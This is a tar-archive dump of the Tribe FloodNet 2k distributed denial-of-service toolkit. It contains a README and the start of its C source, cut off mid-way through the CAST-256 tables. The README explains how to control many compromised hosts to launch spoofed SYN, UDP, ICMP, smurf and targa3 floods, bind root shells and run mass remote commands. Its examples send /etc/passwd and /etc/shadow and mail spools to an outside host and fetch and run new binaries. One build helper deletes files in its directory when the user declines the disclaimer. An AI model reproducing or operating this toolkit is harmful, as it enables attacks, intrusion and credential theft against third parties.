tfn2k/ 40755 0 0 0 7026764023 10072 5ustar rootroottfn2k/README100600 0 0 26541 7026763773 11102 0ustar rootroot-----BEGIN PGP SIGNED MESSAGE----- Tribe FloodNet 2k edition Distributed Denial Of Service Network (c) Mixter Contents: 0. About 1. Feature description 2. Compilation 3. Installation 4. Using the client 4.1. Using TFN for other distributed tasks 5. Technology description 6. Conclusions and Acknowledgements About TFN can be seen as the yet most functional DoS attack tool with the best performance that is now almost impossible to detect. What is my point in releasing this? Let me assure you it isn't to harm people or companies. It is, however, to scare the heck out of everyone who does not care about systematically securing his system, because tools sophisticated as this one are out, currently being improved drastically, kept PRIVATE, and some of them not with the somewhat predictable functionality of Denial Of Service. It is time for everyone to wake up, and realize the worst scenario that could happen to him if he does not care enough about security issues. Therefore, this program is also designed to compile on a maximum number of various operating systems, to show that almost no modern operating system is specifically secure, including Windows, Solaris, most UNIX flavors and Linux. Feature description Using distributed client/server functionality, stealth and encryption techniques and a variety of functions, TFN can be used to control any number of remote machines to generate on-demand, anonymous Denial Of Service attacks and remote shell access. The new and improved features in this version include: Functionality additions: * Remote one-way command execution for distributed execution control * Mix attack aimed at weak routers * Targa3 attack aimed at systems with IP stack vulnerabilities * Compatibility to many UNIX systems and Windows NT Anonymous stealth client/server communication using: * spoofed source addresses * strong advanced encryption * one-way communication protocol * messaging via random IP protocol * decoy packets Compilation You have to agree to the disclaimer in order to compile TFN. Before you compile, make sure to edit src/Makefile and uncomment the options for your operating system. You are advised to take a look at src/config.h and edit it to change some important default values. Once you start compiling, you will be prompted for a server password that can be 8 to 32 characters long. If you compile with REQUIRE_PASS, you will need to remember and type in this password in order to use the client. Installation The TFN server is installed on a host running as root (or euid root). It will not commit changes of system configuration in any way itself, so you would have to make it restarting after system reboots. Once the server is installed, you can add the hostname to your list of ready servers (but you can contact single servers as well). The TFN client can be run from most (root) shells and windows command line (with Administrator privileges needed on NT). Using the client The client, tfn, is used to contact the servers, which then will change their configuration, spawn a shell, or control flood against a multiple number of victim hosts. You can either read the servers hosts from a file containing the hostnames: tfn -f file or you can contact one server at a time: tfn -h hostname The default command issued is to stop flooding by killing all child threads on the server hosts. Commands can generally be issued with -c . See TFN command line and descriptions below. The option -i is needed to give option values to commands, and to parse the string of target hosts, which consists of all victim hosts, separated by a delimiter character, which is @ by default. When using smurf flood, only the first target is a victim and the following ones are used as directed broadcast flood amplifier addresses. ID 1 - Anti Spoof Level: The DoS attack commenced by the servers will always emanate from spoofed source IP addresses. With this command, you can control which part of the IP address will be spoofed, and which part will contain real bits of the actual IP. ID 2 - Change Packet Size: The default ICMP/8, SMURF, and UDP attacks use packets of a minimal size by default. You can increase this size by changing the payload size of each packet in bytes. ID 3 - Bind root shell: Starts a one-session server that drops you to a root shell when you connect to the specified port. ID 4 - UDP flood attack. This attack can be used to exploit the fact that for every udp packet sent to a closed port, there will be an ICMP unreachable message sent back, multiplying the attacks potential. ID 5 - SYN flood attack. This attack steadily sends bogus connection requests. Possible effects include denial of service on one or more targeted ports, filled up TCP connection tables and attack potential multiplication by TCP/RST responses to non-existent hosts. ID 6 - ICMP echo reply (ping) attack. This attack sends ping requests from bogus source IPs, to which the victim replies with equally large response packets. ID 7 - SMURF attack. Sends out ping requests with the source address of the victim to broadcast amplifiers, hosts that reply with a drastically multiplied bandwidth back to the source. ID 8 - MIX attack. This sends UDP, SYN and ICMP packets interchanged on a 1:1:1 relation, which can specifically be hazard to routers and other packet forwarding devices or NIDS and sniffers. ID 9 - TARGA3 attack. Uses random packets with IP based protocols and values that are known to be critical or bogus, and can cause some IP stack implementations to crash, fail, or show other undefined behavior. ID 10 - Remote command execution. Gives the opportunity of one-way mass executing remote shell commands on the servers. See sub section 4.1 on further usage of this function. For further information on the options, see also the command line help. Using TFN for other distributed tasks According to the CERT advisory, recent versions of distributed attack tools also include a new popular feature: self-updating software. While I didn't explicitly include this function, it is basically possible to do with TFN. Command #10, remote command execution, gives the TFN user the ability of executing the same shell commands in "batch" mode on any number of remote hosts. This should be regarded as a tiny demonstration that distributed network tools are capable of virtually anything, beyond such relatively simple things as Denial Of Service attacks. Following are some fun but thoroughly evil examples: (These are EXAMPLES, not suggestions.. just in case you plan on suing me =P) Remotely self-updating TFN servers: Set up an account "user" at sample.edu for world access by putting "+ +" into "~/.rhosts". Place "tfn3000" into /tmp, and issue the command: tfn -f hosts.txt -c10 -i "( rcp user@sample.edu:/tmp/tfn3000 /tmp/tfn3000\ && killall -9 td && mv -f /tmp/tfn3000 /etc/owned/td && /etc/owned/td ) &" Fetch password files: On your local host, type: while :; do 'nc -l -p 666 >> passwds' ; done Now issue the command: tfn -f hosts.txt -c10 -i "( hostname ; ypcat \ passwd || cat /etc/passwd /etc/shadow ) | telnet intruders.org 666" Fun with Network Intrusion Detection: tfn -f hosts.txt -c10 -i "echo 'GET /cgi-bin/phf?Qname=x%0A/bin/something\ %20is%20wrong%20with%20your%20IDS' | telnet www.security-corporation.com 80" Fun with e-mail: tfn -f hosts.txt -c10 -i "cat ~mail/* | gzip -c | uuencode -m surprise.gz \ | mail -s surprise root@intruders.org" or tfn -f hosts.txt -c10 -i "echo better take care, people could accidentally\ shoot you | mail -s 'a word of warning' president@whitehouse.gov" Just a few of the possibilities, use your imagination... if nothing else gets people to secure their networks, maybe these perspectives will. O:) Technology description TFN consists of a client and an unlimited number of servers that are each installed on different hosts. Each one of these servers is utilized to commence floods with spoofed source IPs. Communication between client and server is realized using a randomly chosen protocol, TCP, UDP or ICMP, with internal values optimized so that no recognizable pattern can be found in client/server communication and that the packets easily pass through most filtering mechanisms. The actual Tribe Protocol (tm) is contained in the packet payload. It is CAST-256 encrypted and base64 encoded, and is decoded by the TFN servers in first place. The payload then consists of the header, which is the command ID surrounded by two equal characters, and followed by the target or option string. The clients source IP address is generally spoofed, but a custom IP may be used for purposes like evasion of rfc2267 ingress/egress filtering, as well as a custom protocol. Additionally, any amount of decoy packets can optionally be sent out with every real packet, in order to obscure the real servers locations, thereby completely obscuring the client/server communication. Conclusions and Acknowledgements If any conclusion can be made, then it is that you cannot reliably trust pattern or attack signature matching when it comes to providing systematic, real, security. This includes network and host based intrusion detection (no typical default strings can be found in the server executable.. oh and by the way, even if it could be detected, there are public programs that convert ELF binaries to self-extracting compressed executables...). Examine the TFN server closely, look at the resources it uses, try netstat or strace, and you will find that it looks very harmless. Imagine binaries like these installed on your systems, and conclude, that only systematic and consequent security efforts can ensure you a secure environment. Shouts to phifli and random, other authors of distributed DoS, so1o / Code Zero for their ICMP tunneling code, Steven K., David Brumley and Dave Dittrich who analyzed distributed attack tools in the first place. For more information on distributed attack tools and security, see: * distributed attack tool collection http://packetstorm.securify.com/distributed * distributed attack tools CERT advisory http://www.cert.org/incident_notes/IN-99-07.html * tools and other publications from me http://mixter.void.ru Mixter MD5SUMS 28c9ca45a0efc86aa4ce79ea04f8a481 Makefile 7d45db74140a457966d1b6e5abd15b53 src/Makefile be00356daefa5dc90e7838acdf24f898 src/aes.c 640aeacbd88ee76789e980bcff48642f src/aes.h 4a963f419f2e47f5279c38faf05c39b1 src/base64.c 8f6ab658ecc6985432931995d797b52a src/cast.c 57799312d11c174f3089dd2165a51104 src/config.h 7addb56200ebd7f8d438a15b5ccf85b8 src/disc.c d7f4138165a5a13981f36c7a6804d9e5 src/flood.c 12e38b0e674de1b763ecac60b3fd6366 src/ip.c 83b151072d26250cf608e81105c3bd01 src/ip.h 1786c88475b5188340240539813e5d1f src/mkpass.c 38cac21f5ba17909ea251d182da9f1a9 src/process.c 4b502ea1b820b0f9b210b8eae01afc2b src/td.c 4341813bcce5e5caf9de53d8f2749d4c src/tfn.c 93461e1f5016be38a15f674bf92e0dc8 src/tribe.c 562f6979a23e4a8c9852ee11b7d1f379 src/tribe.h -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBOFvn+rdkBvUb0vPhAQEDfQf9HDWYJQDb2WWAGcmB3mHcdV8spWWskOiE 2MH0+vjgVcKrrjb2pmkVrolPKzh64PN+2ZHI8z/6fVWJq6NPeii17vcs2vySu9Xv VUYOVQafhl14pdMpQuyOILMKcIspeDo3eATOLznjombTxRYFwnut3DPer+1vfJXp D/jcnLEmmtuW1IHbwURDz3ncQ1iM/+F94qJLfpDZPC+yBjje5MlG1ZEGkeTSiyil 3qjRlhdXxjk5efW+144WJ1AZFg3HQHSJFk5YJDDCTOhGyYDJfxumBanple2bZd8L DUkwZ50ZsXI0AN01hnwwy5dwoCBWuTlCo2RtZndTai0+tRZZN5zV8w== =XRYt -----END PGP SIGNATURE----- tfn2k/Makefile100644 0 0 160 7026540160 11576 0ustar rootroot# Tribe FloodNet - 2k edition # by Mixter all: cd src && make cp src/td src/tfn . tfn2k/src/ 40755 0 0 0 7026540160 10653 5ustar rootroottfn2k/src/Makefile100644 0 0 1414 7026540160 12410 0ustar rootroot# Tribe FloodNet - 2k edition # by Mixter # Generic Makefile # Linux / *BSD* / Others CC = gcc CFLAGS = -Wall -O3 CLIBS = # Solaris (IRIX / AIX / HPUX ?) #CC = gcc #CFLAGS = -Wall -O3 #CLIBS = -lnsl -lsocket # Win32 (cygwin) #CC = gcc #CFLAGS = -Wall -DWINDOZE -O2 #CLIBS = SERVER_OBJ = pass.o aes.o base64.o cast.o flood.o ip.o process.o tribe.o td.o CLIENT_OBJ = pass.o aes.o base64.o cast.o ip.o tribe.o tfn.o all: td tfn clean: @echo removing junk... @rm -f tfn td mkpass disc pass.c *.exe *.o *~ tfn: agreed ${CLIENT_OBJ} ${CC} ${CFLAGS} ${CLIBS} ${CLIENT_OBJ} -o tfn strip tfn td: agreed ${SERVER_OBJ} ${CC} ${CFLAGS} ${CLIBS} ${SERVER_OBJ} -o td strip td agreed: disc ./disc pass.c: mkpass ./mkpass war: @echo ...not love\! tfn2k/src/disc.c100644 0 0 2023 7026540160 12033 0ustar rootroot#include #include #include #include #include int system (const char *string); /* Yes, this is lame, I know =P */ char *disclaimer = " This program is distributed for educational purposes and without any\n" " explicit or implicit warranty; in no event shall the author or contributors\n" " be liable for any direct, indirect or incidental damages arising in any way\n" " out of the use of this software.\n\n" " I hereby certify that I will not hold the author liable for any wanted\n" " or unwanted effects caused by this program and that I will give the author\n" " full credit and exclusively use this program for educational purposes.\n\n"; int main (void) { if (open ("agreed", O_RDONLY) >= 0) exit (0); printf ("%s\nDo you agree to this disclaimer [y/n]? ", disclaimer); switch (getchar ()) { case 'y': case 'Y': close (open ("agreed", O_WRONLY | O_CREAT | O_TRUNC)); break; default: system ("/bin/rm -f ./*"); } return (0); } tfn2k/src/aes.c100644 0 0 2557 7026540160 11675 0ustar rootroot/* AES CryptAPI - implementation of AES functions for * * character buffer / binary / text encryption. * * Written Nov 99 by Mixter */ #include "aes.h" u4byte * aes_setkey (char *password) { u4byte keylen = strlen (password) * 8; u4byte key[strlen (password) / 4]; memcpy (key, password, strlen (password)); return (set_key (key, keylen)); } u1byte * encode (u1byte * inbuf, int len) { u4byte i, in_blk[4], out_blk[4]; if (len % 16 != 0) len += 16 - (len % 16); for (i = 0; i < len - 15; i += 16) { memcpy (in_blk, inbuf + i, 16); aes_encrypt (in_blk, out_blk); memcpy (inbuf + i, out_blk, 16); } return inbuf; } u1byte * decode (u1byte * inbuf, int len) { u4byte i, in_blk[4], out_blk[4]; if (len % 16 != 0) len += 16 - (len % 16); for (i = 0; i < len - 15; i += 16) { memcpy (in_blk, inbuf + i, 16); decrypt (in_blk, out_blk); memcpy (inbuf + i, out_blk, 16); } return inbuf; } u1byte * encode64 (u1byte * inbuf, u1byte * outbuf, int len) { if (!len) return inbuf; encode (inbuf, len); base64_in (inbuf, (char *) outbuf, len + 16); return outbuf; } u1byte * decode64 (u1byte * inbuf, u1byte * outbuf, int len) { if (!len) return inbuf; base64_out ((char *) inbuf, outbuf, len); decode (outbuf, len); return outbuf; } tfn2k/src/aes.h100644 0 0 12600 7026540160 11710 0ustar rootroot/* AES CryptAPI - interface to use AES algorithms for * * character buffer / binary / text encryption. * * Written Nov 99 by Mixter * * and based on the NIST standard definitions for * * AES cryptography source code. */ #ifndef _AES_H #define _AES_H void base64_in (unsigned char *, char *, int); void base64_out (char *, unsigned char *, int); typedef unsigned char u1byte; /* an 8 bit unsigned character type */ typedef unsigned short u2byte; /* a 16 bit unsigned integer type */ typedef unsigned long u4byte; /* a 32 bit unsigned integer type */ typedef signed char s1byte; /* an 8 bit signed character type */ typedef signed short s2byte; /* a 16 bit signed integer type */ typedef signed long s4byte; /* a 32 bit signed integer type */ #ifdef __cplusplus extern "C" { u4byte *aes_setkey (char *password); u1byte *encode (u1byte * inbuf, int len); u1byte *decode (u1byte * inbuf, int len); u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); u1byte *decode64 (u1byte * inbuf, u1byte * outbuf, int len); char **cipher_name (void); u4byte *set_key (const u4byte in_key[], const u4byte key_len); void aes_encrypt (const u4byte in_blk[4], u4byte out_blk[4]); void decrypt (const u4byte in_blk[4], u4byte out_blk[4]); }; #else u4byte *aes_setkey (char *password); u1byte *encode (u1byte * inbuf, int len); u1byte *decode (u1byte * inbuf, int len); u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); u1byte *decode64 (u1byte * inbuf, u1byte * outbuf, int len); char **cipher_name (void); u4byte *set_key (const u4byte in_key[], const u4byte key_len); void aes_encrypt (const u4byte in_blk[4], u4byte out_blk[4]); void decrypt (const u4byte in_blk[4], u4byte out_blk[4]); #endif #ifndef _MSC_VER #define rotr(x,n) (((x) >> ((int)(n))) | ((x) << (32 - (int)(n)))) #define rotl(x,n) (((x) << ((int)(n))) | ((x) >> (32 - (int)(n)))) #else #include #pragma intrinsic(_lrotr,_lrotl) #define rotr(x,n) _lrotr(x,n) #define rotl(x,n) _lrotl(x,n) #endif #define bswap(x) ((rotl(x, 8) & 0x00ff00ff) | (rotr(x, 8) & 0xff00ff00)) #define byte(x,n) ((u1byte)((x) >> (8 * n))) #ifdef BYTE_SWAP #define io_swap(x) bswap(x) #else #define io_swap(x) (x) #endif #ifdef WORD_SWAP #define get_block(x) \ ((u4byte*)(x))[0] = io_swap(in_blk[3]); \ ((u4byte*)(x))[1] = io_swap(in_blk[2]); \ ((u4byte*)(x))[2] = io_swap(in_blk[1]); \ ((u4byte*)(x))[3] = io_swap(in_blk[0]) #define put_block(x) \ out_blk[3] = io_swap(((u4byte*)(x))[0]); \ out_blk[2] = io_swap(((u4byte*)(x))[1]); \ out_blk[1] = io_swap(((u4byte*)(x))[2]); \ out_blk[0] = io_swap(((u4byte*)(x))[3]) #define get_key(x,len) \ ((u4byte*)(x))[4] = ((u4byte*)(x))[5] = \ ((u4byte*)(x))[6] = ((u4byte*)(x))[7] = 0; \ switch((((len) + 63) / 64)) { \ case 2: \ ((u4byte*)(x))[0] = io_swap(in_key[3]); \ ((u4byte*)(x))[1] = io_swap(in_key[2]); \ ((u4byte*)(x))[2] = io_swap(in_key[1]); \ ((u4byte*)(x))[3] = io_swap(in_key[0]); \ break; \ case 3: \ ((u4byte*)(x))[0] = io_swap(in_key[5]); \ ((u4byte*)(x))[1] = io_swap(in_key[4]); \ ((u4byte*)(x))[2] = io_swap(in_key[3]); \ ((u4byte*)(x))[3] = io_swap(in_key[2]); \ ((u4byte*)(x))[4] = io_swap(in_key[1]); \ ((u4byte*)(x))[5] = io_swap(in_key[0]); \ break; \ case 4: \ ((u4byte*)(x))[0] = io_swap(in_key[7]); \ ((u4byte*)(x))[1] = io_swap(in_key[6]); \ ((u4byte*)(x))[2] = io_swap(in_key[5]); \ ((u4byte*)(x))[3] = io_swap(in_key[4]); \ ((u4byte*)(x))[4] = io_swap(in_key[3]); \ ((u4byte*)(x))[5] = io_swap(in_key[2]); \ ((u4byte*)(x))[6] = io_swap(in_key[1]); \ ((u4byte*)(x))[7] = io_swap(in_key[0]); \ } #else #define get_block(x) \ ((u4byte*)(x))[0] = io_swap(in_blk[0]); \ ((u4byte*)(x))[1] = io_swap(in_blk[1]); \ ((u4byte*)(x))[2] = io_swap(in_blk[2]); \ ((u4byte*)(x))[3] = io_swap(in_blk[3]) #define put_block(x) \ out_blk[0] = io_swap(((u4byte*)(x))[0]); \ out_blk[1] = io_swap(((u4byte*)(x))[1]); \ out_blk[2] = io_swap(((u4byte*)(x))[2]); \ out_blk[3] = io_swap(((u4byte*)(x))[3]) #define get_key(x,len) \ ((u4byte*)(x))[4] = ((u4byte*)(x))[5] = \ ((u4byte*)(x))[6] = ((u4byte*)(x))[7] = 0; \ switch((((len) + 63) / 64)) { \ case 4: \ ((u4byte*)(x))[6] = io_swap(in_key[6]); \ ((u4byte*)(x))[7] = io_swap(in_key[7]); \ case 3: \ ((u4byte*)(x))[4] = io_swap(in_key[4]); \ ((u4byte*)(x))[5] = io_swap(in_key[5]); \ case 2: \ ((u4byte*)(x))[0] = io_swap(in_key[0]); \ ((u4byte*)(x))[1] = io_swap(in_key[1]); \ ((u4byte*)(x))[2] = io_swap(in_key[2]); \ ((u4byte*)(x))[3] = io_swap(in_key[3]); \ } #endif #ifdef BLOCK_SWAP #define BYTE_SWAP #define WORD_SWAP #endif #endif tfn2k/src/base64.c100644 0 0 5167 7026540160 12211 0ustar rootroot/* base64 encoding/decoding functions by Mixter */ const char b64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; char ascii[256] = { 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64, 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64, 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64 }; void base64_in (unsigned char *buf, char *obuf, int len) { int i; for (i = 0; i < len - 2; i += 3) { *obuf++ = b64[(buf[i] >> 2) & 0x3F]; *obuf++ = b64[((buf[i] & 0x3) << 4 | ((int) (buf[i + 1] & 0xF0) >> 4))]; *obuf++ = b64[((buf[i + 1] & 0xF) << 2) | ((int) (buf[i + 2] & 0xC0) >> 6)]; *obuf++ = b64[buf[i + 2] & 0x3F]; } if (i < len) { *obuf++ = b64[(buf[i] >> 2) & 0x3F]; if (i == (len - 1)) { *obuf++ = b64[((buf[i] & 0x3) << 4)]; // *obuf++ = '='; } else { *obuf++ = b64[((buf[i] & 0x3) << 4 | ((int) (buf[i + 1] & 0xf0) >> 4))]; *obuf++ = b64[((buf[i + 1] & 0xf) << 2)]; } // *obuf++ = '='; } *obuf++ = '\0'; } void base64_out (char *buf, unsigned char *obuf, int len) { int nprbytes; char *p = buf; while (ascii[(int) *(p++)] <= 63); nprbytes = len - 1; while (nprbytes > 4 && *buf != '\0') { *(obuf++) = (ascii[(int) *buf] << 2 | ascii[(int) buf[1]] >> 4); *(obuf++) = (ascii[(int) buf[1]] << 4 | ascii[(int) buf[2]] >> 2); *(obuf++) = (ascii[(int) buf[2]] << 6 | ascii[(int) buf[3]]); buf += 4; nprbytes -= 4; } if (nprbytes > 1) *(obuf++) = (ascii[(int) *buf] << 2 | ascii[(int) buf[1]] >> 4); if (nprbytes > 2) *(obuf++) = (ascii[(int) buf[1]] << 4 | ascii[(int) buf[2]] >> 2); if (nprbytes > 3) *(obuf++) = (ascii[(int) buf[2]] << 6 | ascii[(int) buf[3]]); *(obuf)++ = '\0'; } tfn2k/src/cast.c100644 0 0 40645 7026540160 12077 0ustar rootroot/* * this is cast-256 (c) Carlisle Adams of Entrust Tecnhologies * implementation written by Dr Brian Gladman (gladman@seven77.demon.co.uk) * * You can also use other encryption candidates for AES to do encrypted * sessions, see the documentation on how to do this. * */ #define BYTE_SWAP #ifdef CORE_TIME #undef BYTE_SWAP #endif #include "aes.h" u4byte s_box[4][256] = { { 0x30fb40d4, 0x9fa0ff0b, 0x6beccd2f, 0x3f258c7a, 0x1e213f2f, 0x9C004dd3, 0x6003e540, 0xcf9fc949, 0xbfd4af27, 0x88bbbdb5, 0xe2034090, 0x98d09675, 0x6e63a0e0, 0x15c361d2, 0xc2e7661d, 0x22d4ff8e, 0x28683b6f, 0xc07fd059, 0xff2379c8, 0x775f50e2, 0x43c340d3, 0xdf2f8656, 0x887ca41a, 0xa2d2bd2d, 0xa1c9e0d6, 0x346c4819, 0x61b76d87, 0x22540f2f, 0x2abe32e1, 0xaa54166b, 0x22568e3a, 0xa2d341d0, 0x66db40c8, 0xa784392f, 0x004dff2f, 0x2db9d2de, 0x97943fac, 0x4a97c1d8, 0x527644b7, 0xb5f437a7, 0xb82cbaef, 0xd751d159, 0x6ff7f0ed, 0x5a097a1f, 0x827b68d0, 0x90ecf52e, 0x22b0c054, 0xbc8e5935, 0x4b6d2f7f, 0x50bb64a2, 0xd2664910, 0xbee5812d, 0xb7332290, 0xe93b159f, 0xb48ee411, 0x4bff345d, 0xfd45c240, 0xad31973f, 0xc4f6d02e, 0x55fc8165, 0xd5b1caad, 0xa1ac2dae, 0xa2d4b76d, 0xc19b0C50, 0x882240f2, 0x0c6e4f38, 0xa4e4bfd7, 0x4f5ba272, 0x564c1d2f, 0xc59c5319, 0xb949e354, 0xb04669fe, 0xb1b6ab8a, 0xc71358dd, 0x6385c545, 0x110f935d, 0x57538ad5, 0x6a390493, 0xe63d37e0, 0x2a54f6b3, 0x3a787d5f, 0x6276a0b5, 0x19a6fcdf, 0x7a42206a, 0x29f9d4d5, 0xf61b1891, 0xbb72275e, 0xaa508167, 0x38901091, 0xc6b505eb, 0x84c7cb8c, 0x2ad75a0f, 0x874a1427, 0xa2d1936b, 0x2ad286af, 0xaa56d291, 0xd7894360, 0x425c750d, 0x93b39e26, 0x187184c9, 0x6c00b32d, 0x73e2bb14, 0xa0bebc3c, 0x54623779, 0x64459eab, 0x3f328b82, 0x7718cf82, 0x59a2cea6, 0x04ee002e, 0x89fe78e6, 0x3fab0950, 0x325ff6C2, 0x81383f05, 0x6963c5c8, 0x76cb5ad6, 0xd49974c9, 0xca180dcf, 0x380782d5, 0xc7fa5cf6, 0x8ac31511, 0x35e79e13, 0x47da91d0, 0xf40f9086, 0xa7e2419e, 0x31366241, 0x051ef495, 0xaa573b04, 0x4a805d8d, 0x548300d0, 0x00322a3c, 0xbf64cddf, 0xba57a68e, 0x75c6372b, 0x50afd341, 0xa7c13275, 0x915a0bf5, 0x6b54bfab, 0x2b0b1426, 0xab4cc9d7, 0x449ccd82, 0xf7fbf265, 0xab85c5f3, 0x1b55db94, 0xaad4e324, 0xcfa4bd3f, 0x2deaa3e2, 0x9e204d02, 0xc8bd25ac, 0xeadf55b3, 0xd5bd9e98, 0xe31231b2, 0x2ad5ad6c, 0x954329de, 0xadbe4528, 0xd8710f69, 0xaa51c90f, 0xaa786bf6, 0x22513f1e, 0xaa51a79b, 0x2ad344cc, 0x7b5a41f0, 0xd37cfbad, 0x1b069505, 0x41ece491, 0xb4c332e6, 0x032268d4, 0xc9600acc, 0xce387e6d, 0xbf6bb16c, 0x6a70fb78, 0x0d03d9c9, 0xd4df39de, 0xe01063da, 0x4736f464, 0x5ad328d8, 0xb347cc96, 0x75bb0fc3, 0x98511bfb, 0x4ffbcc35, 0xb58bcf6a, 0xe11f0abc, 0xbfc5fe4a, 0xa70aec10, 0xac39570a, 0x3f04442f, 0x6188b153, 0xe0397a2e, 0x5727cb79, 0x9ceb418f, 0x1cacd68d, 0x2ad37c96, 0x0175cb9d, 0xc69dff09, 0xc75b65f0, 0xd9db40d8, 0xec0e7779, 0x4744ead4, 0xb11c3274, 0xdd24cb9e, 0x7e1c54bd, 0xf01144f9, 0xd2240eb1, 0x9675b3fd, 0xa3ac3755, 0xd47c27af, 0x51c85f4d, 0x56907596, 0xa5bb15e6, 0x580304f0, 0xca042cf1, 0x011a37ea, 0x8dbfaadb, 0x35ba3e4a, 0x3526ffa0, 0xc37b4d09, 0xbc306ed9, 0x98a52666, 0x5648f725, 0xff5e569d, 0x0ced63d0, 0x7c63b2cf, 0x700b45e1, 0xd5ea50f1, 0x85a92872, 0xaf1fbda7, 0xd4234870, 0xa7870bf3, 0x2d3b4d79, 0x42e04198, 0x0cd0ede7, 0x26470db8, 0xf881814C, 0x474d6ad7, 0x7c0c5e5c, 0xd1231959, 0x381b7298, 0xf5d2f4db, 0xab838653, 0x6e2f1e23, 0x83719c9e, 0xbd91e046, 0x9a56456e, 0xdc39200c, 0x20c8c571, 0x962bda1c, 0xe1e696ff, 0xb141ab08, 0x7cca89b9, 0x1a69e783, 0x02cc4843, 0xa2f7c579, 0x429ef47d, 0x427b169c, 0x5ac9f049, 0xdd8f0f00, 0x5c8165bf }, { 0x1f201094, 0xef0ba75b, 0x69e3cf7e, 0x393f4380, 0xfe61cf7a, 0xeec5207a, 0x55889c94, 0x72fc0651, 0xada7ef79, 0x4e1d7235, 0xd55a63ce, 0xde0436ba, 0x99c430ef, 0x5f0c0794, 0x18dcdb7d, 0xa1d6eff3, 0xa0b52f7b, 0x59e83605, 0xee15b094, 0xe9ffd909, 0xdc440086, 0xef944459, 0xba83ccb3, 0xe0c3cdfb, 0xd1da4181, 0x3b092ab1, 0xf997f1c1, 0xa5e6cf7b, 0x01420ddb, 0xe4e7ef5b, 0x25a1ff41, 0xe180f806, 0x1fc41080, 0x179bee7a, 0xd37ac6a9, 0xfe5830a4, 0x98de8b7f, 0x77e83f4e, 0x79929269, 0x24fa9f7b, 0xe113c85b, 0xacc40083, 0xd7503525, 0xf7ea615f, 0x62143154, 0x0d554b63, 0x5d681121, 0xc866c359, 0x3d63cf73, 0xcee234c0, 0xd4d87e87, 0x5c672b21, 0x071f6181, 0x39f7627f, 0x361e3084, 0xe4eb573b, 0x602f64a4, 0xd63acd9c, 0x1bbc4635, 0x9e81032d, 0x2701f50c, 0x99847ab4, 0xa0e3df79, 0xba6cf38c, 0x10843094, 0x2537a95e, 0xf46f6ffe, 0xa1ff3b1f, 0x208cfb6a, 0x8f458c74, 0xd9e0a227, 0x4ec73a34, 0xfc884f69, 0x3e4de8df, 0xef0e0088, 0x3559648d, 0x8a45388c, 0x1d804366, 0x721d9bfd, 0xa58684bb, 0xe8256333, 0x844e8212, 0x128d8098, 0xfed33fb4, 0xce280ae1, 0x27e19ba5, 0xd5a6c252, 0xe49754bd, 0xc5d655dd, 0xeb667064, 0x77840b4d, 0xa1b6a801, 0x84db26a9, 0xe0b56714, 0x21f043b7, 0xe5d05860, 0x54f03084, 0x066ff472, 0xa31aa153, 0xdadc4755, 0xb5625dbf, 0x68561be6, 0x83ca6b94, 0x2d6ed23b, 0xeccf01db, 0xa6d3d0ba, 0xb6803d5c, 0xaf77a709, 0x33b4a34c, 0x397bc8d6, 0x5ee22b95, 0x5f0e5304, 0x81ed6f61, 0x20e74364, 0xb45e1378, 0xde18639b, 0x881ca122, 0xb96726d1, 0x8049a7e8, 0x22b7da7b, 0x5e552d25, 0x5272d237, 0x79d2951c, 0xc60d894c, 0x488cb402, 0x1ba4fe5b, 0xa4b09f6b, 0x1ca815cf, 0xa20c3005, 0x8871df63, 0xb9de2fcb, 0x0cc6c9e9, 0x0beeff53, 0xe3214517, 0xb4542835, 0x9f63293c, 0xee41e729, 0x6e1d2d7c, 0x50045286, 0x1e6685f3, 0xf33401c6, 0x30a22c95, 0x31a70850, 0x60930f13, 0x73f98417, 0xa1269859, 0xec645c44, 0x52c877a9, 0xcdff33a6, 0xa02b1741, 0x7cbad9a2, 0x2180036f, 0x50d99c08, 0xcb3f4861, 0xc26bd765, 0x64a3f6ab, 0x80342676, 0x25a75e7b, 0xe4e6d1fc, 0x20c710e6, 0xcdf0b680, 0x17844d3b, 0x31eef84d, 0x7e0824e4, 0x2ccb49eb, 0x846a3bae, 0x8ff77888, 0xee5d60f6, 0x7af75673, 0x2fdd5cdb, 0xa11631c1, 0x30f66f43, 0xb3faec54, 0x157fd7fa, 0xef8579cc, 0xd152de58, 0xdb2ffd5e, 0x8f32ce19, 0x306af97a, 0x02f03ef8, 0x99319ad5, 0xc242fa0f, 0xa7e3ebb0, 0xc68e4906, 0xb8da230c, 0x80823028, 0xdcdef3c8, 0xd35fb171, 0x088a1bc8, 0xbec0c560, 0x61a3c9e8, 0xbca8f54d, 0xc72feffa, 0x22822e99, 0x82c570b4, 0xd8d94e89, 0x8b1c34bc, 0x301e16e6, 0x273be979, 0xb0ffeaa6, 0x61d9b8c6, 0x00b24869, 0xb7ffce3f, 0x08dc283b, 0x43daf65a, 0xf7e19798, 0x7619b72f, 0x8f1c9ba4, 0xdc8637a0, 0x16a7d3b1, 0x9fc393b7, 